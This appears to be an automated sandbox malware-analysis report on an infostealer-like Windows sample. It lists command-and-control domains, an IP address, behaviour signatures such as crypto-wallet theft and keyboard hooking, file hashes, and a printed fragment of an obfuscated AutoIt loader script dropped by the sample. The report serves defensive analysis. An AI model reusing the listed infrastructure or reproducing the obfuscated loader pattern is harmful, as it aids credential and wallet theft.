            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            Remote System Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            System Network Configuration Discovery
            Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480529 Sample: 80441fcf.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 36 assumptionflattyou.shop 2->36 38 qBnWsPFfTrJBhDSbGyd.qBnWsPFfTrJBhDSbGyd 2->38 40 198.187.3.20.in-addr.arpa 2->40 50 Found malware configuration 2->50 52 Antivirus detection for URL or domain 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 56 5 other signatures 2->56 8 80441fcf.exe 10 2->8         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\Temp\...\Cookbook, PE32 8->30 dropped 58 Found many strings related to Crypto-Wallets (likely being stolen) 8->58 60 Contains functionality to register a low level keyboard hook 8->60 12 cmd.exe 1 8->12         started        15 conhost.exe 8->15         started        signatures6 process7 signatures8 62 Uses ping.exe to sleep 12->62 64 Drops PE files with a suspicious file extension 12->64 66 Uses ping.exe to check the status of other devices and networks 12->66 17 Apply.pif 12->17         started        21 PING.EXE 1 12->21         started        23 cmd.exe 2 12->23         started        26 7 other processes 12->26 process9 dnsIp10 32 assumptionflattyou.shop 172.67.163.54, 443, 49731, 49733 CLOUDFLARENETUS United States 17->32 42 Query firmware table information (likely to detect VMs) 17->42 44 Found many strings related to Crypto-Wallets (likely being stolen) 17->44 46 Found API chain indicative of sandbox detection 17->46 48 3 other signatures 17->48 34 127.0.0.1 unknown unknown 21->34 28 C:\Users\user\AppData\Local\...\Apply.pif, PE32 23->28 dropped file11 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            80441fcf.exe100%AviraBDS/Agent.pjroe
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
            https://assumptionflattyou.shop/os0%Avira URL Cloudsafe
            pooreveningfuseor.pw0%Avira URL Cloudsafe
            technologyenterdo.shop100%Avira URL Cloudmalware
            edurestunningcrackyow.fun0%Avira URL Cloudsafe
            problemregardybuiwo.fun0%Avira URL Cloudsafe
            https://assumptionflattyou.shop/40%Avira URL Cloudsafe
            https://assumptionflattyou.shop/api100%Avira URL Cloudmalware
            associationokeo.shop100%Avira URL Cloudmalware
            turkeyunlikelyofw.shop100%Avira URL Cloudmalware
            http://www.autoitscript.com/autoit3/X0%Avira URL Cloudsafe
            https://assumptionflattyou.shop/apis0%Avira URL Cloudsafe
            https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
            detectordiscusser.shop100%Avira URL Cloudmalware
            https://assumptionflattyou.shop/apiy0%Avira URL Cloudsafe
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            lighterepisodeheighte.fun0%Avira URL Cloudsafe
            https://assumptionflattyou.shop/Pa0%Avira URL Cloudsafe
            https://assumptionflattyou.shop/0%Avira URL Cloudsafe
            assumptionflattyou.shop0%Avira URL Cloudsafe
            https://assumptionflattyou.shop:443/api100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            assumptionflattyou.shop
            172.67.163.54
            truetrue
              unknown
              qBnWsPFfTrJBhDSbGyd.qBnWsPFfTrJBhDSbGyd
              unknown
              unknownfalse
                unknown
                198.187.3.20.in-addr.arpa
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  edurestunningcrackyow.funtrue
                  • Avira URL Cloud: safe
                  unknown
                  problemregardybuiwo.funtrue
                  • Avira URL Cloud: safe
                  unknown
                  technologyenterdo.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  pooreveningfuseor.pwtrue
                  • Avira URL Cloud: safe
                  unknown
                  associationokeo.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  https://assumptionflattyou.shop/apifalse
                  • Avira URL Cloud: malware
                  unknown
                  turkeyunlikelyofw.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  detectordiscusser.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  lighterepisodeheighte.funtrue
                  • Avira URL Cloud: safe
                  unknown
                  assumptionflattyou.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://assumptionflattyou.shop/apirApply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    https://assumptionflattyou.shop/osApply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://assumptionflattyou.shop/4Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.rootca1.amazontrust.com/rootca1.crl0Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.autoitscript.com/autoit3/XApply.pif, 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmp, Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://assumptionflattyou.shop/apisApply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ocsp.rootca1.amazontrust.com0:Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.autoitscript.com/autoit3/Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://assumptionflattyou.shop/apiyApply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brApply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://assumptionflattyou.shop/PaApply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://x1.c.lencr.org/0Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://x1.i.lencr.org/0Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crt.rootca1.amazontrust.com/rootca1.cer0?Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://assumptionflattyou.shop/Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.mozilla.org/products/firefoxgro.allApply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://assumptionflattyou.shop:443/apiApply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.163.54
                    assumptionflattyou.shopUnited States
                    13335CLOUDFLARENETUStrue
                    IP
                    127.0.0.1
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1480529
                    Start date and time:2024-07-24 21:03:42 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 10s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:16
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:80441fcf.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@23/9@3/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 97
                    • Number of non-executed functions: 278
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 40.126.32.72, 40.126.32.136, 40.126.32.134, 20.190.160.14, 40.126.32.138, 40.126.32.140, 40.126.32.68, 20.190.160.20
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: 80441fcf.exe
                    TimeTypeDescription
                    15:05:14API Interceptor6x Sleep call for process: Apply.pif modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    172.67.163.54https://assets-usa.mkt.dynamics.com/492791da-6fc7-ee11-9075-6045bd00390b/digitalassets/standaloneforms/35c1b077-37d2-ee11-9079-000d3a32e3b3Get hashmaliciousHTMLPhisherBrowse
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUShttps://forms.office.com/r/kiNP3VZaGzGet hashmaliciousUnknownBrowse
                      • 1.1.1.1
                      7Y18r(97).exeGet hashmaliciousLummaCBrowse
                      • 188.114.97.3
                      7Y18r(69).exeGet hashmaliciousUnknownBrowse
                      • 162.159.61.3
                      http://id.cemgage.comGet hashmaliciousUnknownBrowse
                      • 104.16.141.114
                      https://sourceconnect.bigreport.com/verify?token=qRTJWwwWaHLZrsa2ALkGE2xQJBJOUj7LGet hashmaliciousUnknownBrowse
                      • 104.18.35.133
                      7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                      • 188.114.96.3
                      Fd_HR24 Jul, 2024.pdfGet hashmaliciousPhisherBrowse
                      • 172.64.41.3
                      7Y18r(114).exeGet hashmaliciousUnknownBrowse
                      • 104.16.185.241
                      7Y18r(114).exeGet hashmaliciousUnknownBrowse
                      • 104.16.185.241
                      Restortion.clinic.exeGet hashmaliciousEmpyrean, Discord Token StealerBrowse
                      • 104.16.124.96
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      a0e9f5d64349fb13191bc781f81f42e17Y18r(97).exeGet hashmaliciousLummaCBrowse
                      • 172.67.163.54
                      7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                      • 172.67.163.54
                      7Y18r(111).exeGet hashmaliciousUnknownBrowse
                      • 172.67.163.54
                      7Y18r(111).exeGet hashmaliciousUnknownBrowse
                      • 172.67.163.54
                      XEV5ucEWu7.exeGet hashmaliciousUnknownBrowse
                      • 172.67.163.54
                      611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeGet hashmaliciousBdaejec, PrivateLoaderBrowse
                      • 172.67.163.54
                      qGJBgGtR7e.exeGet hashmaliciousGh0stCringe, GhostRat, Mimikatz, RunningRATBrowse
                      • 172.67.163.54
                      VaajyQsbTV.exeGet hashmaliciousGhostRat, NitolBrowse
                      • 172.67.163.54
                      PXTCFXKM.exeGet hashmaliciousLummaCBrowse
                      • 172.67.163.54
                      RQTMGXIK.msiGet hashmaliciousLummaCBrowse
                      • 172.67.163.54
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\7ZipSfx.000\CookbookekDMpiTYbC.exeGet hashmaliciousRedLineBrowse
                        last.htaGet hashmaliciousAsyncRATBrowse
                          TierDiagnosis.exeGet hashmaliciousAsyncRATBrowse
                            file.exeGet hashmaliciousRedLineBrowse
                              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif7d69f17f.exeGet hashmaliciousRedLineBrowse
                                Filezillawin_94199_patched.exeGet hashmaliciousUnknownBrowse
                                  Filezillawin_94199_patched.exeGet hashmaliciousUnknownBrowse
                                    4spS4Frgbl.exeGet hashmaliciousRaccoon Stealer v2Browse
                                      4spS4Frgbl.exeGet hashmaliciousRaccoon Stealer v2Browse
                                        RiKuOxbSRz.exeGet hashmaliciousRHADAMANTHYSBrowse
                                          1FspNrPaFJ.exeGet hashmaliciousUnknownBrowse
                                            1FspNrPaFJ.exeGet hashmaliciousUnknownBrowse
                                              installation.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                install.pdf.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):946784
                                                  Entropy (8bit):6.628560786473655
                                                  Encrypted:false
                                                  SSDEEP:24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
                                                  MD5:848164D084384C49937F99D5B894253E
                                                  SHA1:3055EF803EEEC4F175EBF120F94125717EE12444
                                                  SHA-256:F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
                                                  SHA-512:AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
                                                  Malicious:true
                                                  Joe Sandbox View:
                                                  • Filename: 7d69f17f.exe, Detection: malicious, Browse
                                                  • Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse
                                                  • Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse
                                                  • Filename: 4spS4Frgbl.exe, Detection: malicious, Browse
                                                  • Filename: 4spS4Frgbl.exe, Detection: malicious, Browse
                                                  • Filename: RiKuOxbSRz.exe, Detection: malicious, Browse
                                                  • Filename: 1FspNrPaFJ.exe, Detection: malicious, Browse
                                                  • Filename: 1FspNrPaFJ.exe, Detection: malicious, Browse
                                                  • Filename: installation.exe, Detection: malicious, Browse
                                                  • Filename: install.pdf.lnk, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with very long lines (939), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):717936
                                                  Entropy (8bit):5.358908701155791
                                                  Encrypted:false
                                                  SSDEEP:6144:btJQJF1QKRpG++eJ+yTGsfvrKS1TTxIxyCnblLs8tDsAntFiGAsY6WzYRi84XVNC:IXvaMwDdHRi8qNrQKsnObl8ocwI/
                                                  MD5:BAA1587C7EFFD1D982A3CFE987D0F4A2
                                                  SHA1:EDF879652A193AC9F685A44FC8FF39DA7571F803
                                                  SHA-256:E4160779100599C8404FD1153F0AF398DF82C8A78CE0AE98E53FDCEFDFCAD60F
                                                  SHA-512:68D8FDD4877AC7D97A238AD9FE2F91160BF71EA54CBB62BEBE56DBFB00DCFE88D6291B9188FF6500CAFF28BD3B4518F4697E30227279F6059324E6756A995EA4
                                                  Malicious:false
                                                  Preview:Func LatinaDrawHappyDk($PastaHivViolin, $rodskilledburden)..$PuttingNasty = @AutoItX64..If $PuttingNasty Then..Local $BlankStudyInjury = electronxp("53]125]61]62]72]53]58]58]57]61]61]62]72]61]57]61]61]62]73]58]57]62]61]62]72]70]57]58]56]54]72]62]58]60]58]59]58]56]57]61]61]56]74]72]53]61]72]60]53]54]53]53]53]53]53]53]53]53]72]60]57]54]53]57]53]53]53]53]53]53]53]53]57]58]61]61]57]70]53]61]57]54]61]56]72]54]53]54]57]62]61]56]72]55]53]54]57]54]61]54]75]62]53]53]53]54]53]53]53]53]60]58]74]71]57]61]61]73]71]62]53]53]53]54]53]53]53]53]57]58]56]54]73]55]59]59]57]58]56]54]72]62]74]71]56]59]57]54]71]70]53]54]53]53]53]53]53]53]56]54]75]59]53]75]71]59]58]61]53]61]53]75]71]59]54]57]55]74]61]73]56]57]54]56]57]59]61]73]53]72]53]74]57]58]53]75]71]59]72]62]57]73]59]56]73]62]57]55]53]75]71]59]60]57]54]62]53]61]57]53]61]61]60]53]53]61]57]61]61]56]72]53]53]54]57]55]61]61]58]72]54]62]53]61]57]61]56]62]75]61]60]57]53]74]57]58]56]62]73]53]60]74]72]58]57]62]59]56]75]55]57]54",30/6)..$BlankStudyInjury &= elect
                                                  Process:C:\Users\user\Desktop\80441fcf.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):146016
                                                  Entropy (8bit):5.991963512177502
                                                  Encrypted:false
                                                  SSDEEP:3072:66jKj+wsxjgarB3RZgDWy4ZNogXJ3i2Umb2Oq:664EgarxUaBZ2myoG
                                                  MD5:E66C8890C2EB6ADBA5948D082BD215A6
                                                  SHA1:93A813794B38B728C8A6248C64221A419B026CE4
                                                  SHA-256:99E62C44A3DBF370201324564C94BE16FFB81B29C543EC5FD6F14E1A3BE75E1A
                                                  SHA-512:9B7546CEE1BA82FF4DB0A3598098BE91BBD114E4A80116B15AC9EA106FA881B201EEE6DDA4EE91B2D917ECAAB5BC2327DCD34047C60F122F6E0FDACB79E49D17
                                                  Malicious:false
                                                  Preview:rward reference offset.internal error: unexpected repeat.unrecognized character after (? or (?-.POSIX named classes are supported only within a class.missing ).reference to non-existent subpattern.erroffset passed as NULL.unknown option bit(s) set.missing ) after comment.parentheses nested too deeply.regular expression is too large.failed to get memory.unmatched parentheses.internal error: code overflow.unrecognized character after (?<.lookbehind assertion is not fixed length.malformed number or name after (?(.conditional group contains more than two branches.assertion expected after (?( or (?(?C).(?R or (?[+-]digits must be followed by ).unknown POSIX class name.POSIX collating elements are not supported.this version of PCRE is compiled without UTF support.spare error.character value in \x{} or \o{} is too large.invalid condition (?(0).\C not allowed in lookbehind assertion.PCRE does not support \L, \l, \N{name}, \U, or \u.number after (?C is > 255.closing ) for (?C expected.recursive
                                                  Process:C:\Users\user\Desktop\80441fcf.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):218112
                                                  Entropy (8bit):6.538289120139155
                                                  Encrypted:false
                                                  SSDEEP:6144:LQBk7JjX74cN0lrztgwU0Wyw3mFygyE4m:LO0z8e0lvSr0Wyw20K4m
                                                  MD5:E9DB611974409FB7C1770FE95BFD5402
                                                  SHA1:AD077D6F8AD48BD4A8EDBCA88711CC4B7C71C1B5
                                                  SHA-256:FC141FFE6BF256B8794C769FEED25FA8BFEFF01A60CDD2699E2D84E94585553C
                                                  SHA-512:623694FDCC7ACD66ED8170A158D2209706311566E04629C5A03B133902F729A554C3AAA6C85EF1163EDAA3DFAFD72D85B49F6EDFA73E5419E57FAC1D2F489799
                                                  Malicious:false
                                                  Joe Sandbox View:
                                                  • Filename: ekDMpiTYbC.exe, Detection: malicious, Browse
                                                  • Filename: last.hta, Detection: malicious, Browse
                                                  • Filename: TierDiagnosis.exe, Detection: malicious, Browse
                                                  • Filename: file.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\80441fcf.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):295936
                                                  Entropy (8bit):6.717953006560187
                                                  Encrypted:false
                                                  SSDEEP:6144:fqd12lqlEAehuqN8zwNzlmhPL1b5nZ2tZ6lfA6Gfm608DsvqJX4xNn:fqClqlEZuB1b5Z2tZ6XKmNvqJWNn
                                                  MD5:863CE19B37F186C47A26882E399B9A81
                                                  SHA1:3843EDED5FDD895E41694174D79789854BCCADA5
                                                  SHA-256:0DBCC3E2CCFD18644F4EC3A24058CF6109E520B0C2213D8A083B5200696D20C6
                                                  SHA-512:CA5323396012958B0269F4F0C1AF62C0B26F593D061D81755060873DC270AA8680D4F61B00A445FC123D406D6F0E06FC1F7D45BC54C1EFDC757B7E3531199F33
                                                  Malicious:false
                                                  Preview:...]..U..W.u..|..Y.M....I....u..B..........E.j.Y...............E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.Sj.[.......E.j.Y....!..E..`...E..@......u3V.u.j..3..Y;.t..u.S.3..Y;.u.W.....Y..u..u..-...Y^.u..].S.3...YY..u..E.j.Y..............[_]..U..W.u..{..Y.M....I....u!.1..........E.j.Y.................E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.SVj.[.......E.j.Y....!..E..`...E..@......u1.u.j..2..Y;.t..u.S.2..Y;.u.W.....Y..u..u......Y.u..u.V.....YY..u..E.j.Y................^[_]..U..VW.u..kz..Y.M...I...........M.3..A..1+.@...E..H.I.H...~&.E.V.p.R..........E..H..E...3.;.....d...t....t.....?...k.0.....M......L..@( t.j.WWR.4..#......u..E.j.Y..........j..E.PR.$......H....@_^]..U..VW.u..y..Y.M...I...........M.3..A..1+.......E..H.....H...~(.E.V.p.R...........E..H.f.E.f..3.;.....f...t....t.....?...k.0.....M......L..@( t.j.WWR..3..#......u..E.j.Y..........j..E.PR.R.............@_^]..U..]./.....U..].5...j.hX.L.
                                                  Process:C:\Users\user\Desktop\80441fcf.exe
                                                  File Type:ASCII text, with very long lines (939), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):717936
                                                  Entropy (8bit):5.358908701155791
                                                  Encrypted:false
                                                  SSDEEP:6144:btJQJF1QKRpG++eJ+yTGsfvrKS1TTxIxyCnblLs8tDsAntFiGAsY6WzYRi84XVNC:IXvaMwDdHRi8qNrQKsnObl8ocwI/
                                                  MD5:BAA1587C7EFFD1D982A3CFE987D0F4A2
                                                  SHA1:EDF879652A193AC9F685A44FC8FF39DA7571F803
                                                  SHA-256:E4160779100599C8404FD1153F0AF398DF82C8A78CE0AE98E53FDCEFDFCAD60F
                                                  SHA-512:68D8FDD4877AC7D97A238AD9FE2F91160BF71EA54CBB62BEBE56DBFB00DCFE88D6291B9188FF6500CAFF28BD3B4518F4697E30227279F6059324E6756A995EA4
                                                  Malicious:false
                                                  Preview:Func LatinaDrawHappyDk($PastaHivViolin, $rodskilledburden)..$PuttingNasty = @AutoItX64..If $PuttingNasty Then..Local $BlankStudyInjury = electronxp("53]125]61]62]72]53]58]58]57]61]61]62]72]61]57]61]61]62]73]58]57]62]61]62]72]70]57]58]56]54]72]62]58]60]58]59]58]56]57]61]61]56]74]72]53]61]72]60]53]54]53]53]53]53]53]53]53]53]72]60]57]54]53]57]53]53]53]53]53]53]53]53]57]58]61]61]57]70]53]61]57]54]61]56]72]54]53]54]57]62]61]56]72]55]53]54]57]54]61]54]75]62]53]53]53]54]53]53]53]53]60]58]74]71]57]61]61]73]71]62]53]53]53]54]53]53]53]53]57]58]56]54]73]55]59]59]57]58]56]54]72]62]74]71]56]59]57]54]71]70]53]54]53]53]53]53]53]53]56]54]75]59]53]75]71]59]58]61]53]61]53]75]71]59]54]57]55]74]61]73]56]57]54]56]57]59]61]73]53]72]53]74]57]58]53]75]71]59]72]62]57]73]59]56]73]62]57]55]53]75]71]59]60]57]54]62]53]61]57]53]61]61]60]53]53]61]57]61]61]56]72]53]53]54]57]55]61]61]58]72]54]62]53]61]57]61]56]62]75]61]60]57]53]74]57]58]56]62]73]53]60]74]72]58]57]62]59]56]75]55]57]54",30/6)..$BlankStudyInjury &= elect
                                                  Process:C:\Users\user\Desktop\80441fcf.exe
                                                  File Type:ASCII text, with very long lines (1840), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):12562
                                                  Entropy (8bit):5.805312300705228
                                                  Encrypted:false
                                                  SSDEEP:96:taFnFM5LjvgSc9uMkVh2sTkXnts9fJXRY2kSMM2bZIdrEKAAVBJYbfGguTakfdVE:MZF0vZJT6ntsH22T2Nltuw7Sd4jowNHf
                                                  MD5:B649C8B485F6B192061AD04A185F03DC
                                                  SHA1:6FB0CC214D6D55D400793C3D085D9EA98C7FBB87
                                                  SHA-256:FEE25A6FCBD1D1BFBECA85E9A97E882D1B4A0BC5A521838F8B6EE1FE6C7370E9
                                                  SHA-512:E12FDC7E64F6B2AD9EF45B01EC7AB87BB1DBA4C29E727517B9690018B2EC699BDD2173CF9EAC8A0F3441C32BA8A952AB8DE2B0BF63C6C47C94F56BA92BF2CBE3
                                                  Malicious:false
